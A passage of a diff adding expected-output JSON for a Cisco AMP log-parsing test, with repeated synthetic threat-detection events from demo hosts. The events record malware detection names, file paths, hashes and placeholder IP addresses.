"cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63259, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259286289612895", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 669000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259286289613000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 64578, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:13.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259234750005342", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259234750005000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 65897, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259183210397789", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 645000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259183210398000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 67216, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6180335966167760897", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6180335966167761000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", + "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "file.name": "Fax.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 68535, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" + ], + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590309", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 672000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668885361590000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 70133, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259135965757532", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 8000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259135965757000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 74097, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 291000000, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1489955900291000600, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:17:41.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 75414, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251520740130915", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 3000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251520740131000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 76706, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251516445163618", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 988000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251516445164000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 78028, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251512150196266", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 942000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 152159, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259080131182683", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 996000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259080131183000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 187917, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251507855228943", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 944000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 189236, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261640", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 821000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 198516, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259028591575130", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 984000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259028591575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 207155, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251439135752194", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 455000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251439135752000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 208474, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + 